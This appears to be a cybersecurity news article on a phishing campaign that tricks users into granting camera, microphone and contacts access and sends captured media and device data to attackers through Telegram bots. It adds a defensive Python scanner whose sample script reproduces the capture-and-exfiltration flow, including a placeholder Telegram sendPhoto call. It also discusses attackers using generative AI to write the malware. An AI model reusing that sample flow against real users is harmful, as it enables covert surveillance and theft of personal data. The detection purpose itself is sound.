AI-Driven Phishing Campaign Exploits Browser Permissions to Harvest Sensitive Data
A sophisticated phishing campaign has emerged, leveraging artificial intelligence to enhance its tactics, as revealed by Cyble Research & Intelligence Labs (CRIL). This campaign, active since early 2026, marks a significant shift from traditional credential theft methods to more invasive, technology-driven approaches.
Campaign Overview
The phishing operation employs a variety of social engineering tactics, utilizing themes such as ID scanning, Telegram ID freezing, and “Health Fund AI.” These deceptive strategies aim to manipulate users into granting access to sensitive hardware features, including cameras and microphones, under the pretense of verification or account recovery.
Once users grant these permissions, malicious scripts initiate extensive data collection. This data encompasses images, video recordings, audio from microphones, device specifications, contact details, and approximate geographic locations. The stolen information is then swiftly transmitted to systems controlled by the attackers via Telegram bots, facilitating efficient exfiltration.
Researchers have identified indications of AI-assisted code generation within the campaign’s infrastructure. The presence of structured annotations and unusual formatting in the scripts suggests that generative AI tools may have been employed to streamline the development and deployment processes.
Infrastructure and Attack Mechanism
The campaign predominantly utilizes the edgeone.app platform to host phishing pages, allowing for scalable and cost-effective deployment. These pages impersonate reputable platforms such as TikTok, Instagram, Telegram, Google Chrome, and even popular games like Flappy Bird, thereby fostering user trust.
Unlike conventional phishing attacks that rely on victims entering their credentials, this AI-driven campaign focuses on obtaining browser-level permissions. When a user interacts with a phishing page, JavaScript code triggers permission prompts. If accepted, the script activates the device camera, capturing live data.
A key technique involves rendering frames from the live video stream onto an HTML5 canvas using ctx.drawImage(), then converting the canvas contents into a JPEG file via canvas.toBlob(). This file is then transmitted to the attackers through the Telegram Bot API, a method also used for video and audio recordings.
Expanded Data Collection Capabilities
The phishing framework extends beyond simple media capture, incorporating extensive device fingerprinting through various browser APIs, including:
- navigator.userAgent
- navigator.platform
- navigator.deviceMemory
- navigator.hardwareConcurrency
- navigator.connection
- navigator.getBattery
These methods enable attackers to gather detailed information about the victim’s device, such as the operating system, browser version, CPU capacity, RAM, network type, and battery status. Additionally, the script retrieves the victim’s IP address through external services, enriching it with geolocation data, including country, city, latitude, and longitude. This aggregated information is sent to the attackers before further data collection occurs.
The campaign also attempts to access contact lists using the browser’s Contacts Picker API. If users grant permission, names, phone numbers, and email addresses are extracted and transmitted.
Role of Telegram in Data Exfiltration
A notable aspect of this campaign is its reliance on Telegram for command-and-control operations. By utilizing Telegram bots, attackers eliminate the need for complex backend infrastructure. Data such as images, videos, and audio files are sent directly through API methods like sendPhoto, sendVideo, and sendAudio. This approach simplifies operations while providing attackers with immediate access to stolen information.
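For defenders triaging a suspected page from this campaign, the combination described above (a permission-gated capture API, canvas frame conversion, device fingerprinting, and a Telegram Bot API exfil URL) is a workable static signature. The following Python script is an added example, not code from the CRIL report or the campaign; the two sample scripts and the bot token in them are constructed placeholders, and the token format the regex assumes is an assumption. It scores a script and pulls out the bot token and API methods for reporting.

```python
import re

# Constructed samples (assumed, not the campaign's real code): the first follows the flow the
# article describes, the second is ordinary page logic that also touches navigator.
SAMPLE_PHISHING_SCRIPT = """
const stream = await navigator.mediaDevices.getUserMedia({video: true, audio: true});
ctx.drawImage(video, 0, 0);
canvas.toBlob(b => { fd.append('photo', b, 'id.jpg'); }, 'image/jpeg');
fetch('https://api.telegram.org/bot123456789:EXAMPLE_TOKEN_PLACEHOLDER/sendPhoto', {method: 'POST', body: fd});
const info = {ua: navigator.userAgent, mem: navigator.deviceMemory, cpu: navigator.hardwareConcurrency};
navigator.getBattery().then(b => { info.battery = b.level; });
const contacts = await navigator.contacts.select(['name', 'tel', 'email']);
"""
SAMPLE_BENIGN_SCRIPT = """
console.log(navigator.userAgent);
fetch('/api/profile').then(r => r.json());
"""

# One regex group per building block of the kit; userAgent is omitted because it is ubiquitous.
INDICATORS = {
    "media_capture": [r"getUserMedia\s*\(", r"\bMediaRecorder\b"],
    "frame_exfil": [r"\.drawImage\s*\(", r"\.toBlob\s*\("],
    "fingerprinting": [r"navigator\.(?:deviceMemory|hardwareConcurrency|connection|getBattery|platform)\b"],
    "contacts": [r"navigator\.contacts\.select\s*\("],
    "telegram_c2": [r"api\.telegram\.org/bot"],
}
# Bot token and API method, extracted for reporting/takedown (token format is an assumption).
TELEGRAM_CALL = re.compile(r"api\.telegram\.org/bot(\d+:[A-Za-z0-9_-]+)/(send\w+)")

def scan_script(js: str) -> dict:
    """Return a verdict plus the matched calls and any Telegram bot tokens/methods."""
    hits = {}
    for name, patterns in INDICATORS.items():
        hits[name] = sorted({m.group(0) for p in patterns for m in re.finditer(p, js)})
    calls = TELEGRAM_CALL.findall(js)
    categories = [name for name, found in hits.items() if found]
    # A lone fingerprinting call is normal analytics; a permission-gated capture API paired
    # with a Telegram exfil channel is the signature the article describes.
    capture = bool(hits["media_capture"] or hits["contacts"])
    if capture and calls:
        verdict = "malicious"
    elif len(categories) >= 2:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "categories": categories, "hits": hits,
            "bot_tokens": sorted({token for token, _ in calls}),
            "telegram_methods": sorted({method for _, method in calls})}
```

The extracted bot token is what you would report to Telegram for bot takedown, and the method names tell you which media types the kit was configured to exfiltrate.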
User Interface Deception
To maintain credibility, phishing pages display realistic status messages such as “Capturing photo,” “Sending to server,” and “Photo sent successfully.” These prompts mimic legitimate verification workflows, reinforcing the illusion of authenticity. Once the data is captured and transmitted, the script shuts down the camera and resets the interface, leaving minimal visible traces of the attack.
Risks and Business Impact
The implications of this AI-driven phishing campaign are substantial. By collecting biometric and contextual data, attackers gain powerful tools for:
- Identity theft and account takeover
- Bypassing video-based verification systems
- Targeted social engineering attacks
- Extortion using captured multimedia
For instance, images and audio recordings could be used to impersonate victims or bypass Know Your Customer (KYC) systems. Device and location data enable attackers to craft highly personalized attacks, thereby increasing their success rate.
Organizations face additional risks, including reputational damage, regulatory exposure, and financial losses. The use of impersonated brands further amplifies the threat by eroding trust in legitimate digital services.
One unusual finding in this campaign is the presence of emojis embedded within the script’s operational logic. While uncommon in manually written malware, such patterns are linked to AI-assisted code generation, suggesting that attackers may be leveraging generative AI tools to accelerate development and scale their operations.
As reported by thecyberexpress.com, this evolving threat landscape underscores the need for heightened vigilance and robust cybersecurity measures to protect against increasingly sophisticated phishing attacks.